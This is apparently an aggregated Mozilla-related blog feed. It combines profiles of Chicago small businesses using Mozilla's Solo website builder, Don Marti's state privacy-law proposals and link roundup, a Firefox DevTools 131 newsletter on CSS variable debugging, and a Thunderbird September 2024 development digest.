To step into Danielle’s world is to experience solace and peace intended for people seeking a place to simply be. Since it opened in 2019, Semicolon has been a staple in Chicago’s literary community, offering a selection of books that celebrate stories and voices from Black history. This is also reflected in the art and cultural pieces that cover the bookstore’s walls. 

“Independence is what creates my safety,” she explained, pointing to the word “independence” tattooed on her left forearm. 

With her work, Danielle strives to foster independence in others. One of her goals is to improve youth literacy in Chicago. She frequently donates much of her inventory to book drives for children, as well as for incarcerated individuals across Illinois.

Danielle encourages finding empowerment by building one’s own safe haven, just as she did.  “If you’re someone who constantly feels othered, create something,” Danielle advised. “It’s the only way to build a safe mental, emotional and physical space for yourself.”

A bookshelf displaying books that highlight Black voices, including Eloquent Rage by Brittney Cooper and A Darker Wilderness by Erin Sharkey.<figcaption class="wp-element-caption">A display of books at Semicolon Books, highlighting titles that celebrate Black voices and experiences. Credit: Jesus J. Montero</figcaption>

The experiences that inspired Danielle to open Semicolon began in her childhood. “Books saved my life,” she reflected, remembering a time when the world offered her no other escape. Growing up, Danielle moved between homeless shelters, where books became her refuge. They opened her eyes to endless possibilities and offered life lessons that carried her into adulthood.

Her love for books continues to shape her today. “I’m always reading ‘All About Love’ by bell hooks,” Danielle said. “It’s about love in its truest form — community love — and how you can’t love anybody else if you don’t love yourself. But more than that, it teaches that you can’t claim to love something if you aren’t giving back to the community, ensuring that people feel that love in real, tangible ways.”

Empowering others

Two women shake hands and smile in front of Semicolon Books, with a colorful mural visible in the background.<figcaption class="wp-element-caption">Danielle Moore greets a visitor outside Semicolon Books in Chicago. Credit: Jesus J. Montero</figcaption>

Despite facing challenges — whether it’s critics questioning her outward-facing book displays, which isn’t the industry standard, or landlords threatening to raise rent — Danielle remains focused. “I remember sitting in the space, meditating and being reminded that this space isn’t for them,” she said. “This space is for me.” 

Building a business, cultivating a community and creating art are all acts of love for Danielle. “Part of that is making sure others feel free to do the same, to carve out their own spaces of joy and expression,” she said. 

Expanding her world 

Now, as Danielle embarks on new ventures beyond Semicolon’s River West location, she reflects on the journey that brought her here. “Everything always works out,” she said, a personal mantra of sorts. 

Semicolon recently opened a new location on the ground floor of the historic Wrigley Building on the Mag Mile. Danielle also plans to launch an outpost in the East Garfield Park neighborhood.

A person sits on a green couch using a laptop while another person browses books in the background.<figcaption class="wp-element-caption">Visitors enjoy the relaxed atmosphere at Semicolon Books in Chicago, whether browsing the shelves or working on laptops. Credit: Jesus J. Montero</figcaption>

Her ambition extends beyond Chicago. In addition to a store in Chicago O’Hare International Airport, Danielle has London and Tokyo locations in her sights.

And as the world expands for Semicolon, so too does its reach online. “The dope part about the internet is that it makes the world small, really fast,” Danielle said. “I can see something incredible, track down the person behind it, and fangirl over them. I love that.” For Danielle, the internet is more than just a tool — it’s a bridge, connecting her with people and communities she might otherwise never encounter.

Owning a bookstore was never part of her original plan, but Danielle now envisions Semicolon becoming the world’s largest independent, nonprofit Black-owned bookseller.

“If I’m not even supposed to be here, I’m gonna do what I want,” she said, determined to spread her message of freedom for all seeking a place to just be.

Aerial view of Semicolon Books, showing the storefront with a colorful mural and several parked cars along the street.<figcaption class="wp-element-caption">An aerial view of Semicolon Books in Chicago. Credit: Jesus J. Montero</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Danielle Moore’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post Semicolon Books: A haven of independence and empowerment in Chicago appeared first on The Mozilla Blog.

The Mozilla BlogThe Pop-Up: A homegrown space for Chicago’s creatives

A man and woman hold hands, with a rack of clothes in the background.<figcaption class="wp-element-caption">Kevin and Molly Woods run The Pop-Up, a resale boutique and creative outlet for local artists, nestled in Chicago’s Wicker Park neighborhood. Credit: Jesus J. Montero</figcaption>

A portrait of a man with curly dark hair and glasses, wearing a patterned shirt and a dark jacket, looking directly at the camera with a neutral expression.
Jesus J. Montero is an award-winning journalist and passionate storyteller. He’s known for his investigative work covering social justice, music and culture. Jesus J. is also a producer, curating dynamic experiences that highlight culture through storytelling and dialogue. You can follow him on Instagram at @JesusJMontero. Photo: Olivia Gatti

Freedom and legacy go hand in hand. For entrepreneurs, it means building something that reflects not only their vision but also the stories they want to share with the world.

Husband-and-wife Kevin and Molly Woods embody that philosophy. Their partnership began with a LinkedIn message — one that didn’t lead to a job, but to something much bigger. “She was a recruiter,” Kevin recalled. “You know those messages you always think are a scam? Well, that’s how we met. She sent me one of those 15 years ago, and we’ve been together ever since.”

A new era of creators

A woman wearing a white shirt focuses on organizing clothes in the boutique.<figcaption class="wp-element-caption">The Pop-Up blends style with community-focused retail in Chicago’s Wicker Park. Credit: Jesus J. Montero</figcaption>

Fast forward to today, Kevin and Molly now run The Pop-Up, a resale boutique and creative outlet for local artists, nestled in Chicago’s Wicker Park neighborhood. The store’s mission is rooted in the spirit of collaboration and community. But that path hasn’t been without challenges.

“This space is more than just a store. It’s our home,” Molly shared after their shop was broken into — twice. Yet, through it all, they stayed resilient. The space, once home to the iconic RSVP Gallery where creatives like Don C and the late Virgil Abloh once shaped Chicago’s cultural scene, is now a hub for a new generation of artists and collaborators.

“This isn’t just about selling clothes,” Kevin emphasized. “It’s about creating a space where ideas take flight, where people can come together to celebrate the boundless creativity in this city.”

Yellow Sade t-shirt from the Lovers Rock Tour hanging against a white brick wall.<figcaption class="wp-element-caption">A vintage yellow Sade t-shirt hangs in The Pop-Up boutique. Credit: Jesus J. Montero</figcaption>

Both Kevin and Molly come from backgrounds in HR, and while they found success in the corporate world, it never quite felt like enough. “We were both HR professionals for years,” Kevin explained, “but we wanted to create something of our own.”

A trip to Japan in 2019 was pivotal. “That trip changed everything for me,” Kevin said. “I came back inspired to create something of my own. I secured the domain as soon as I landed, and that’s when The Pop-Up was born.”

A community-driven comeback

Their dream became a reality, but not without hurdles. After the break-ins, The Pop-Up was forced to close its doors temporarily. However, the community they had poured so much into over the years rallied around them, providing support and encouragement. “It was inspirational to see how everybody in the team rallied together, working through, being resilient, and patient. Knowing that there was light at the end of the tunnel,” Kevin shared.

“They’re not just employees,” Molly added. “They’re family. We’ve watched them grow, their talents blossoming right in front of us.”

A man smiles while sorting through clothes on a rack inside the store.<figcaption class="wp-element-caption">Kevin Woods, co-owner of The Pop-Up, organizes clothing on display in their Wicker Park boutique. Credit: Jesus J. Montero</figcaption>

The Pop-Up now thrives as a collaborative space, hosting local designers, artists and small businesses — each contributing to Chicago’s vibrant creative scene. The internet has also played a role in cultivating this community. “It’s definitely a tool,” Kevin said. “It helps us connect. … But at the end of the day, I still believe in that personal interaction to really connect and validate those relationships.”

Now reopened with a fresh design and layout, The Pop-Up continues its mission of supporting local talent and fostering community. Kevin and Molly’s journey is one of resilience and creativity, and their store stands as a testament to the power of collaboration.

“Working with local people to do great things — that’s how we started, and that’s how all of this came to life,” Kevin said, looking ahead to what’s next for The Pop-Up.

With its doors open once again, The Pop-Up is ready to continue adding to Chicago’s rich history and culture in fashion and beyond — one collaboration at a time.

Aerial photo of Chicago’s Wicker Park neighborhood, with tree-lined streets, buildings, and the city skyline visible in the background.<figcaption class="wp-element-caption">An aerial view of Chicago’s Wicker Park neighborhood, home to The Pop-Up boutique, with the downtown skyline in the distance. Credit: Jesus J. Montero</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out The Pop-Up founders Kevin and Molly Woods’ Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post The Pop-Up: A homegrown space for Chicago’s creatives appeared first on The Mozilla Blog.

The Mozilla BlogDishRoulette Kitchen: Empowering Chicago’s entrepreneurs for generational change

A group of five people smiling and posing in a casual office setting with exposed brick walls, seated and standing near desks and computers.<figcaption class="wp-element-caption">The DishRoulette Kitchen team gathers by a communal table originally from the first restaurant they worked with. Crafted now into a conference table, it remains a symbol of DRK. Credit: Jesus J. Montero</figcaption>

A portrait of a man with curly dark hair and glasses, wearing a patterned shirt and a dark jacket, looking directly at the camera with a neutral expression.
Jesus J. Montero is an award-winning journalist and passionate storyteller. He’s known for his investigative work covering social justice, music and culture. Jesus J. is also a producer, curating dynamic experiences that highlight culture through storytelling and dialogue. You can follow him on Instagram at @JesusJMontero. Photo: Olivia Gatti

Community is power. That’s the driving force behind DishRoulette Kitchen, a support hub for local food entrepreneurs in Chicago’s Pilsen neighborhood.

DRK was born in 2020, at the height of the COVID-19 pandemic. It started with an observation from Brian Soto, an accountant who saw firsthand how many of his small business clients were ineligible for government relief programs because they lacked the necessary paperwork or tax documentation. “So many of these businesses were shut out of crucial government funding,” explained Chris Cole, DRK’s director of partnerships and communications. “Brian realized that this wasn’t just an issue for his clients, but for small businesses across Chicago.”

Brian partnered with Jackson Flores, and together they founded DRK to address these challenges. The goal was simple: to provide grants, coaching and the financial and operational expertise small businesses needed to survive — and thrive. From helping businesses manage their taxes to offering guidance on rent and payroll, DRK has since become a lifeline for many local entrepreneurs.

“We’re scrappy,” admitted Jackson, DRK’s executive director. “We bootstrapped this entire thing, and we’re going to keep making it happen, no matter what, because the people we serve deserve the chance to thrive, to create the life they’ve always dreamed of.”

Support for real-time challenges

A man wearing a white long-sleeve shirt, a cap, and glasses sits in an office chair holding a notebook with the DishRoulette logo. A desk with a laptop and papers is in the background.<figcaption class="wp-element-caption">“When an entrepreneur comes in with a problem, we create a roadmap to turn that into a success,” explained Brian Soto, director of finance at DishRoulette Kitchen. Credit: Jesus J. Montero</figcaption>

Each member of the DRK team brings a wealth of experience, including from the corporate, finance, tech and hospitality industries. Now, they’re applying those principles back into the community, giving entrepreneurs the tools they need to succeed. Since its inception, DRK has created a space where self-made entrepreneurs can tap into that corporate expertise and gain the resources they need. The team offers tailored workshops, consultations and one-on-one coaching.

“It’s not just about the business. It’s about the whole person, the family, the community,” said Hector Pardo, DRK’s director of strategy and operations. “When we see one of our entrepreneurs thrive, it’s like popping a bottle of champagne. We’re in this together, and their wins are our wins.”

For many on the team, this work is personal. DRK Program Analyst Melissa Villalba grew up watching her parents’ small business struggle. She knows firsthand how a resource like DRK could have transformed their experience. “Our parents came here with nothing, but they made it work,” Melissa said. “That’s what inspires us — to see what’s possible when you have the right tools and support.”

DRK tailors its guidance to meet the real-time challenges its entrepreneurs face. “When an entrepreneur comes in with a problem, we create a roadmap to turn that into a success,” Brian explained. The team adjusts their lessons as needed, evolving alongside the businesses they support.

Going digital and beyond

A group of five people in a casual office setting having a conversation, with two standing and three seated near desks and computers in front of an exposed brick wall.<figcaption class="wp-element-caption">Each member of the DRK team brings a wealth of experience, including from the corporate, finance, tech and hospitality industries. Credit: Jesus J. Montero</figcaption>

A key part of that evolution is helping entrepreneurs build and maintain a digital presence, which is crucial in today’s marketplace. “A digital presence is everything for small businesses now,” Chris noted. “We help them not just set up websites, but actually understand how to track their traffic, engage with customers online, and manage sales. We walk them through it one-on-one because too many small business owners don’t get formal training in these areas, and they need someone to show them the ropes.”

DRK’s impact goes beyond just small businesses in Chicago. They’ve worked on national partnerships with major organizations like the James Beard Foundation, and even collaborated on a project with Bad Bunny. But their heart remains rooted in supporting local entrepreneurs.

“We’ve done so many iterations of what we’re doing now, and it’s finally starting to get the attention and support we need,” Jackson added. The team’s diverse leadership is building not only businesses but also a legacy of freedom and opportunity for a new generation of entrepreneurs.

DRK is proof that when local businesses thrive, entire communities benefit. What started as an urgent response to a pandemic-induced crisis has transformed into a vital entrepreneurial hub, one that will continue to create ripple effects throughout Chicago’s neighborhoods for years to come.

A colorful mural on a building in Chicago's Pilsen neighborhood, featuring diverse faces and scenes from the community. The Chicago skyline looms in the background under a bright, clear sky.<figcaption class="wp-element-caption">A vibrant mural celebrating the rich cultural heritage of Chicago’s Pilsen neighborhood against the backdrop of the city’s skyline. Credit: Jesus J. Montero</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out DishRoulette Kitchen‘s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post DishRoulette Kitchen: Empowering Chicago’s entrepreneurs for generational change appeared first on The Mozilla Blog.

The Mozilla BlogLocal roots, digital connections: How Chicago’s small businesses are building with Solo

A man smiles while sorting through clothes on a rack inside the store.<figcaption class="wp-element-caption">Kevin Woods, co-owner of The Pop-Up, organizes clothing on display in their Wicker Park boutique. Credit: Jesus J. Montero</figcaption>

As a community builder at Mozilla, I’m all about staying connected — whether that’s producing community events to invite more people into our brand, or working directly with people to make sure our products are actually helping those who need them most. Recently, I had the chance to sit down with three amazing small business owners in Chicago to explore how Solo, Mozilla’s AI-powered website builder, could help them expand their online presence. Solo is built to make creating websites easy, but these sessions were about more than that — they were about building new websites for these small business owners to share their stories and build stronger connections with their communities.

Each of these entrepreneurs had a unique vision for how they wanted to grow their business online. Here’s how we worked together to bring their ideas to life.

Building a digital hub for a community of first-gen entrepreneurs

A screenshot of DishRoulette Kitchen's website shows a street vendor stand with fresh produce under a blue canopy, with a man standing beside it. The text on the site reads: "Our programs are designed to address the unique challenges faced by BIPOC entrepreneurs, who have long been excluded from fully participating in the entrepreneurial marketplace. By offering access to capital, knowledge, skills, and tools, DRK helps to combat disinvestment and respond to the specific needs of these communities. We are committed to leveling the playing field by providing premium small business consulting services—including accounting, operations, permitting, and marketing—at no cost to our entrepreneurs. At DRK, we understand that investing in locally owned food businesses is a powerful driver of community transformation. We are passionate about disrupting the systemic barriers that have hindered economic participation for so many and believe that everyone, regardless of background, should have the opportunity to succeed. Our mission is to guide entrepreneurs through the complexities of the small business ecosystem, empowering them to show up as they are."<figcaption class="wp-element-caption">Soloist.ai/dishroulette showcases the many restaurants that DishRoulette Kitchen is supporting.</figcaption>

Jackson Flores runs DishRoulette Kitchen, an organization that supports first-generation business owners in Chicago’s food scene. DRK already had a website, but they wanted to take things further. Instead of just focusing on DRK, we decided to create a digital hub that showcases the many restaurants they’re helping — many of which didn’t have their own websites.

We built a directory that brings these restaurants together in one space, making it easy for locals to discover new food spots and connect with the people behind the businesses. Working with Jackson was inspiring — her passion for uplifting first-gen entrepreneurs really shone through. The site we built reflects the amazing work DRK is doing in the community, giving more visibility to the businesses they support. You can check out DRK’s Solo website here

Creating a digital space for a multifaceted career

Three images showing Danielle Moore's diverse work. The first image is of Danielle sitting in her bookstore, SemiColon Books, with shelves of books and a mural in the background. The second image is a close-up of a bottle of Single Story Whiskey being held in her hands. The third image shows a bookshelf filled with books alongside a mural of a boxer, highlighting her work in museum and event curation.<figcaption class="wp-element-caption">DanniMoore.com showcases Danielle Moore’s multifaceted career, highlighting her work with Semicolon Books, Single Story Whiskey and her experience in museum and event curation.</figcaption>

Danielle Moore is the owner of Semicolon Books, an independent bookstore in Chicago with a strong community following. Danielle’s work goes far beyond books — she’s also spent 15 years as a museum curator and has recently launched her own whiskey brand. With all these ventures, Danielle needed a website that could tie everything together and present her full story in one cohesive place.

During our session, we built a personal website that allows her to showcase all sides of her career — from books to art to whiskey. Now, her community can see the full scope of her talent, with a site that reflects the many passions that drive her. For Danielle, it was about creating a digital home where her entire journey could come together, offering a complete picture of who she is and what she’s building. You can check out Danielle’s Solo website here

Turning a long-delayed project into reality

A webpage from Digital Produce featuring a black-and-white photo of a model in locally-made fashion. The text reads, "Locally-Made Fashion, Community Driven," followed by a description of the brand’s mission to support local artisans and offer unique, creative styles.<figcaption class="wp-element-caption">Digital Produce is The Pop-Up founder Kevin Woods’ own streetwear brand.</figcaption>

Kevin is the founder of The Pop-Up, a streetwear business that curates unique pieces from independent brands. While his business is already up and running, he had been working on a new internal line called Digital Produce — a project he’d been passionate about but hadn’t had the time to bring online. Between his full-time job, family, and running the business, creating a website for this new line kept getting delayed. When we sat down to work on it, it felt like the project finally started moving. In just an hour, we built a clean, functional site using Solo that showcases Kevin’s designs, giving his community an easy way to explore his work. For Kevin, the goal was about finally bringing his vision to life after months of putting it off, and giving his brand the platform it deserved. You can check out Digital Produce’s Solo website here.

Building connections, online and beyond

Equipping Jackson, Danielle and Kevin a powerful, free tool like Solo helped each of them find new ways to tell their stories and engage with their communities. With Solo, they’ve created digital spaces that have the potential to strengthen relationships, raise awareness and share their passions in ways they hadn’t before.

Community has always been at the heart of Mozilla’s products, from the early days of Firefox to the tools we’re creating today. Our goal has always been to empower people to shape the internet in ways that reflect who they are and what matters to them. Solo is one part of that effort, giving small business owners the ability to take agency of their digital presence and build meaningful connections with the people around them.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post Local roots, digital connections: How Chicago’s small businesses are building with Solo appeared first on The Mozilla Blog.

Don Martithere ought to be a law

Do we really need another CCPA-like state privacy law, or can states mix it up a little in 2025?

What if, instead of big boring laws intended to cover everything, legislators did more of a do the simplest thing that could possibly work approach? Big Tech lobbyists are expensive—maybe a better way to beat them is, instead of grinding out the long-ass PDFs they expect, make them fight an unpredictable distributed campaign of random-ish short bills that take the side of local small businesses?

  • Require generative AI companies to offer an opt out that is not tied to any other services such as search. AI legal links

  • Surveillance companies should need to get state surveillance licenses. Big Tech platforms: mall, newspaper, or something else?, surveillance licensing in practice

  • Require blocking of search ads on state-owned and educational computers, because of the 2022 FBI warning (that’s still up) and the threat of fake ads intended to steal people’s passwords for commonly used services such as Slack and Calendly. B L O C K in the U S A

  • Require Global Privacy Control for smart TVs and appliances, and for smart home platforms that support ordering or subscriptions. GPC all the things!. We also need an opt-out preference signal for NFC tap to pay devices. (AB 3048 in California was a good idea, but it got changed to cover browsers and phones only, so would have tended to drive surveillance to devices where it’s harder to avoid, which would be a terrible experience for users. Thank you for browsing our catalog site, use your compatible smart appliance to actually order anything.) Update 31 Oct 2024: possibly combine the GPC mandate with a reform to wiretapping laws to address the CIPA Uncertainty that a lot of companies have been on about recently. Amend CIPA and similar state wiretapping laws to state that data collection from a device or client software that supports GPC is definitely not wiretapping. That way the companies get the legal ambiguity resolved, the users get their opt-outs, sounds like a solution we can all live with.

  • Some kind of a digital tearsheet requirement to make it harder to trick advertisers into sponsoring illegal activities. notes on a California advertiser protection bill

  • Require clear explanations of consumer categories and inferences. OTHER ATTRIBUTES

  • Postal RtK/RtD/opt outs. If a postal backup is available, that sets the floor for how annoying a company can make the online process. The problem with CCPA RtK workflows

  • Add miscellaneous power user time saving improvements to existing privacy laws. State privacy law features from the power user point of view

  • Pigovian tax on databases of PII (calculated as n * log(n) to disincentivize risky centralization) taxing surveillance marketing

  • Require platform ad libraries to be crawlable by image indexers like TinEye and by trademark monitoring firms. some ways that Facebook ads are optimized for deceptive advertising

  • Euroclone law: if a company operates in 50 or more countries, and offers a consumer or privacy protection feature to the residents of some jurisdiction outside the USA, then that feature must also be offered to residents of our state. Another easy-ish state law: the No Second-class Citizenship Act

  • Federal: Keep Section 230 immunity for platforms, but pass liability through to the advertisers. Big Tech would have to clean up their act to keep brands.

  • Update existing wiretapping laws to cover modern surveillance in media where no GPC or analogous opt-out is available. In the Kathleen Vita v. New England Baptist Hospital decision, the court wrote, If the Legislature intends for the wiretap act’s criminal and civil penalties to prohibit the tracking of a person’s browsing of, and interaction with, published information on websites, it must say so expressly.

Yes, the Big Tech companies will try to get small businesses to come out and advocate for surveillance, but there are a bunch of other small business issues that limitations on surveillance could help address, by shifting the balance of power away from surveillance companies.

  • Are small business owners contending for search rankings and map listings with fake businesses pretending to be competitors in their neighborhood?

  • Is Big Tech placing bogus charges on their advertiser account–or, if they run ads on their own site, are ad companies docking their pay for unexplained “invalid traffic”?

  • Are companies taking their content for “AI” that directly competes with their sites—without letting them opt out, or offering an opt-out that would make their business unable to use other services?

  • Can a small business even get someone from Big Tech on the phone, or are companies putting their dogmatic programs of union-busting and layoffs ahead of service even to advertisers and good business customers?

  • What happens when an account gets compromised or hacked? Do small businesses have any way to get help (without knowing someone who happens to know someone at the big company?)

Related

privacy economics sources, an easy experiment to support behavioral advertising Lots of claims about the benefits of personalized advertising, not so much evidence.

Calif. Governor vetoes bill requiring opt-out signals for sale of user data

Bonus links

Meta faces data retention limits on its EU ad business after top court ruling

The more sophisticated AI models get, the more likely they are to lie

As the open social web grows, a new nonprofit looks to expand the ‘fediverse’

Google’s GenAI facing privacy risk assessment scrutiny in Europe

The LLM honeymoon phase is about to end

The Department of Transportation’s Underused Privacy Authority

TikTok Inspired Child Suicide Prompts a Sound Reading of Section 230

DOJ Claims Google ‘Destroyed’ Evidence Before Antitrust Trial

The Billionaire Suing Facebook to Remove His Face From AI Scams - WSJ

Don Martilinks for 6 October 2024

Intent IQ Has Patents For Ad Tech’s Most Basic Functions – And It’s Not Afraid To Use Them (Wait a minute. If Firefox is part of the Open Innovation Network’s Linux System definition, and Firefox has ads now, does that mean OIN covers this?) 🍿

New Map Shows Community Broadband Networks Are Exploding In U.S. Community-owned broadband networks provide faster, cheaper, better service than their larger private-sector counterparts. Staffed by locals, they’re also more directly accountable and responsive to the needs of locals

So It Goes GHQ is a board game invented by Kurt Vonnegut in 1956. GHQ is to WWII what chess is to the Medieval battlefield.

The Other Bubble While SaaS is generally a good deal for small-to-mid-sized companies, the inevitable sprawl of letting SaaS into your organization means that you’re stuck with them.

Oskar Wickström: How I Built “The Monospace Web” (fun with CSS, cool vintage style serious-looking design)

Posse: Reclaiming social media in a fragmented world Rather than publishing a post onto someone else’s servers on Twitter or Mastodon or Bluesky or Threads or whichever microblogging service will inevitably come along next, the posts are published locally to a service you control.

Best practices in practice: Black, the Python code formatter I don’t have to explain what they got wrong and why it matters — they don’t even need to understand what happens when the auto-formatter runs. It just cleans things up and we move on with life.

EPIC Publishes Model Privacy Bill as Practical Solution for States (everyone ready for the 2025 privacy bill season next year? There are still some practical problems with this draft—I can see how opting out of every company that might have your data getting to be a big time suck under this. Needs to be simplified to the point where it’s practical IMHO.)

What Happened After I Outed a Reddit Mod for Affiliate Spam (you know that thing where you add reddit to your web search to find honest reviews?)

Valve Steam Deck as a stepping stone to the Linux desktop Thanks to the technology behind Steam Desk, however, you can now play Windows games on Linux without any fuss or muss. (of course, all the growth hacking on Microsoft® brand Windows might help, too)

A layered approach to content blocking Chromium’s Manifest v3 includes the declarativeNetRequest API, which delegates these functions to the browser rather than the extension. Doing so avoids the timing issues visible in privileged extensions and does not require giving the extension access to the page. While these filters are more reliable and improve privilege separation, they are also substantially weaker. You can say goodbye to more advanced anti-adblock circumvention techniques. (Good info on the tradeoffs in Manifest v3, and a possible way forward, with simpler/more secure and complex/more featureful blocking both available to the user)

(If you’re still bored after reading all these, how about trying some effective privacy tips?)

Firefox Developer ExperienceFirefox DevTools Newsletter — 131

Developer Tools help developers write and debug websites on Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 131 Nightly release cycle.

Firefox being an open source project, we are grateful to get contributions from people outside of Mozilla:

Want to help? DevTools are written in HTML, CSS and JS so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues

Supercharging CSS variables debugging

CSS variables, or CSS custom properties if you’re a spec reader, are fantastic for creating easy reusable values through your pages. To make sure they’re as enjoyable to write in your IDE as to debug in the Inspector, all vendors added a way to quickly see the declaration value of a variable when hovering it in the rule view.

DevTools rules view with the following declaration: `height: var(--button-height)`. A tooltip point to the variable and indicates that its value is 20px

This does work nicely as long as your CSS variable does not depend on other variables. For such cases, the declaration story might not give you a good indication of what is going on.

DevTools rules view with the following declaration: `height: var(--default-toolbar-height)`. A tooltip point to the variable and indicates that its value is `var(--default-toolbar-height)`<figcaption class="wp-element-caption">Not really useful, what’s --default-toolbar-height value?</figcaption>

You’re now left with either going through the different variable declarations to try to map the intermediary values to the final one, or look in the Layout panel to check the computed value for the variable. This is not super practical and requires multiple steps, and you might already be frustrated because you’re chasing a bug for 3 hours now and you just want to go home and relax! That happened to us too many times, so we decided to show the computed value for the variable directly in the tooltip, where it’s easy for you to see (#1626234).

DevTools rules view with the following declaration: `height: var(--default-toolbar-height)`. A tooltip point to the variable and indicates that its value is `var(--default-toolbar-height)`. It also show a "computed value" section, into which we can read "calc(24px - 2 * 2px)"


This is even more helpful when you’re using custom registered properties, as the value expression can be properly, well, computed by the CSS engine and give you the final value.

The same declaration as previously, but the tooltip "computed value" section now indicates "20px" There's also a "@property" section with the following:  ```   syntax: '<length>';   inherits: true;   initial-value: 10px; ```


Since we were upgrading the variable tooltip already, we decided to make it look good too, parsing the values the way we do in the rules view already, showing color preview, striking through unused var() and light-dark() parameters, and more (#1912006) !


The variable tooltip with the following value: `var(--border-size, 1px) solid light-dark(hotpink, brown)` The 1px in `var` and `brown` in `light-dark` are struck through, indicating they're not used. The computed value section indicate that the value is `2px solid light-dark(hotpink, brown)`

What’s great with this change is that now that we have the computed value at hand, it’s easy to add color swatch next to variables relying on other variables, which we weren’t doing before (#1630950)

The following rules:  ``` .btn-primary {   color: var(--button-color); } :root {   --button-color: light-dark(var(--primary), var(--base));   --primary: gold;   --base: tomato; } ```  before `var(--button-color)`, we can see a gold color swatch, since the page is in light theme.

Even better, this allows us to show the computed value of the variable in the autocomplete popup (#1911524)!

A value is being added for the color property. The input has the `var(--` text in it, and an autocomplete popup is displayed with 3 items: - `--base tomato` - `--button-color rgb(255, 215, 0) - `--primary gold`

While doing this work and reading the spec, I learnt that you can declare empty CSS variables which are valid.

(…) writing an empty value into a custom property, like --foo: ;, is a valid (empty) value, not the guaranteed-invalid value.

https://www.w3.org/TR/css-variables-1/#guaranteed-invalid

It wasn’t possible to add an empty CSS variable from the Rules view, so we fixed this (#1912263). And then, for such empty values, we show an <empty> string so you’re just not left with an empty space, wondering if there’s a bug in DevTools (#1912267, #1912268).

The following rule is displayed in the rules view:  ``` .btn-primary {   --foo: ;   color: var(--foo); } ```  A tooltip points to `--foo`, and has the following text: `<empty>` The computed panel is also visible, showing `--foo`, which value is also `<empty>`

Enhanced Markup and CSS editing

One of my favorite feature in DevTools is the ability to increase or decrease values in the Rules view using the up and down arrows from the keyboard. In Firefox 131 you can now use the mouse wheel to do the same things, and like with the keyboard, holding Shift will make the increment bigger, and holding Alt (Option on OSX) will make the increment smaller (#1801545). Thanks a lot to Christian Sonne, who started this work!

Editing attributes in the markup view was far from ideal as the differences between an element attribute being focused and the initial state of attribute inputs was almost invisible, even to me. This wasn’t great, especially with all our work on focus indicator which aims to bring clarity to users, so we improved the situation by changing the style of the selected node when an attribute is being modified, which should help make editing less confusing (#1501959, #1907803, #1912209)

<figcaption class="wp-element-caption">Firefox 130 on the left, and Firefox 131 on the right. On the top, the class attribute being focused with the keyboard, on the bottom, the class attribute being edited via an input, with its content selected. On the left, there’s almost no visible differences between the two states.</figcaption>

Bug fixes


In Firefox 127, we did some changes to improve performance of the markup view, including how we detect if we should show the event badge on a given element. Unfortunately we also completely broke the event badge if the page was using jQuery and Array prototype was extended, for example by including Moo.js. This is fixed in this Firefox 131 and in ESR 128 as well (#1916881)

We got a report that enabling the grid highlighter in some specific conditions would stress GPU and CPU, as we were triggering too many reflows, as we were working around platform limitation to avoid rendering issues. This limitation is now gone and we can save up cycle and avoid frying your GPU (#1909170).

Finally, we made selecting a <video> element using the node picker not play/pause said video (#1913263).

And that’s it for this months folks, Thank you for reading this and using our tools, see you in a few weeks for a new round of updates 🙂


Full list of fixed bugs in DevTools for the Firefox 131 release:

Mozilla ThunderbirdThunderbird Monthly Development Digest: September 2024

Hello Thunderbird Community! I’m Toby Pilling, a new team member and I’ve spent the last couple of months getting up to speed, and have really enjoyed meeting the team and members of the community virtually, and some in person! September is now over (and so is the summer for many in our team), and we’re excited to share the latest adventures underway in the Thunderbird world. If you missed our previous update, go ahead and catch up! Here’s a quick summary of what’s been happening across the different teams:

Exchange

Progress continues on implementing move/copy operations, with the ongoing re-architecture aimed at making the protocol ecosystem more generic. Work has also started on error handling, protocol logging and a testing framework. A Rust starter pack has been provided to facilitate on-boarding of new team members with automated type generation as the first step in reducing the friction. 

Account Hub

Development of a refreshed account hub is moving forward, with design work complete and a critical path broken down into sprints. Project milestones and tasks have been established with additional members joining the development team in October. Meta bug & progress tracking.

Global Database & Conversation View

The team is focused on breaking down the work into smaller tasks and setting feature deliverables. Initial work on integrating a unique IMAP ID is being rolled out, while the conversation view feature is being fast-tracked by a focused team, allowing core refactoring to continue in parallel.

In-App Notification

This initiative will provide a mechanism to notify users of important security updates and feature releases “in-app”, in a subtle and unobtrusive manner, and has advanced at break-neck speed with impressive collaboration across each discipline. Despite some last-minute scope creep, the team has moved swiftly into the testing phase with an October release in mind. Meta Bug & progress tracking.

Source Docs Clean-up

Work continues on source documentation clean-up, with support from the release management team who had to reshape some of our documentation toolset. The completion of this project will move much of the developer documentation closer to the actual code which will make things much easier to maintain moving forwards. Stay tuned for updates to this in the coming week and follow progress here.

Account Cross-Device Import

As the launch date for Thunderbird for Android gets closer, we’re preparing a feature in the desktop client which will provide a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the Android client. A functional prototype was delivered quickly. Now that design work is complete, the project entered the 2 final sprints this week. Keep track here.

Battling OAuth Changes

As both Microsoft and Google update their OAuth support and URLs, the team has been working hard to minimize the effect of these changes on our users. Extended logging in Daily will allow for better monitoring and issue resolution as these updates roll out.

New Features Landing Soon

Several requested features are expected to debut this month or very soon:

As usual, if you want to see things as they land you can check the pushlog and try running daily. This would be immensely helpful for catching bugs early.

See ya next month.

Toby Pilling
Sr. Manager, Desktop Engineering

